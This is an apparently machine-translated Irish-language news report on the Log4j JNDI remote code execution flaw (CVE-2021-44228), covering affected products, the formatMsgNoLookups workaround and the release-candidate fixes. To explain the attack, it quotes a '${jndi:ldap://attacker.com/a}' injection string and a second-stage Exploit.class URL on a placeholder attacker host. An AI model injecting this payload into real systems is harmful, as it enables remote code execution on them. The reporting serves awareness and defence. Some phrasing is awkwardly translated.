In Apache Log4j, creat coitianta chun logáil a eagrú i bhfeidhmchláir Java, sainaithníodh leochaileacht ríthábhachtach a cheadaíonn cód treallach a fhorghníomhú nuair a scríobhtar luach sainfhormáidithe san fhormáid “{jndi:URL}” chuig an loga. Is féidir an t-ionsaí a dhéanamh ar iarratais Java a logálann luachanna a fhaightear ó fhoinsí seachtracha, mar shampla, nuair a thaispeánann siad luachanna fadhbacha i dteachtaireachtaí earráide.
Tugtar faoi deara go bhfuil tionchar ag an bhfadhb ar beagnach gach tionscadal a úsáideann creataí cosúil le Apache Struts, Apache Solr, Apache Druid nó Apache Flink, lena n-áirítear Steam, Apple iCloud, cliaint agus freastalaithe Minecraft. Táthar ag súil go bhféadfadh tonn d'ionsaithe ollmhóra ar iarratais chorparáideacha a bheith mar thoradh ar an leochaileacht, ag athrá stair na leochaileachtaí ríthábhachtacha i gcreat Apache Struts, a úsáidtear, de réir meastachán garbh, in iarratais gréasáin faoi 65% de Fortune. 100 cuideachta lena n-áirítear iarrachtaí chun an líonra a scanadh le haghaidh córais leochaileacha.
Tá an fhadhb níos measa ag an bhfíric go bhfuil shaothrú oibre foilsithe cheana féin, ach nach bhfuil réitigh do na brainsí cobhsaí curtha le chéile go fóill. Níl an t-aitheantóir CVE sannta go fóill. Níl an socrú san áireamh ach amháin sa bhrainse tástála log4j-2.15.0-rc1. Mar réiteach chun an leochaileacht a bhlocáil, moltar an paraiméadar log4j2.formatMsgNoLookups a shocrú go fíor.
Ba é ba chúis leis an bhfadhb ná go dtacaíonn log4j le maisc speisialta “{}” a phróiseáil in aschur línte chuig an loga, ina bhféadfaí fiosrúcháin JNDI (Java Nameing and Directory Interface) a chur i gcrích. Baineann an t-ionsaí le teaghrán a rith leis an ionadú “${jndi:ldap://attacker.com/a}”, agus é á phróiseáil agus seolfaidh log4j iarratas LDAP ar an gcosán chuig an rang Java chuig an bhfreastalaí attacker.com . Déanfar an cosán ar ais ó fhreastalaí an ionsaitheora (mar shampla, http://second-stage.attacker.com/Exploit.class) a luchtú agus a fhorghníomhú i gcomhthéacs an phróisis reatha, rud a ligeann don ionsaitheoir cód treallach a fhorghníomhú ar an córas le cearta an fheidhmchláir reatha.
Aguisín 1: Tá an t-aitheantóir CVE-2021-44228 sannta don leochaileacht.
Aguisín 2: Aithníodh bealach chun an chosaint a chuirtear leis trí scaoileadh log4j-2.15.0-rc1 a sheachbhóthar. Tá nuashonrú nua, log4j-2.15.0-rc2, molta le cosaint níos iomláine ar an leochaileacht. Leagann an cód béim ar an athrú a bhaineann le heaspa foirceannadh neamhghnácha i gcás URL JNDI atá formáidithe go mícheart a úsáid.
Foinse: oscailtenet.ru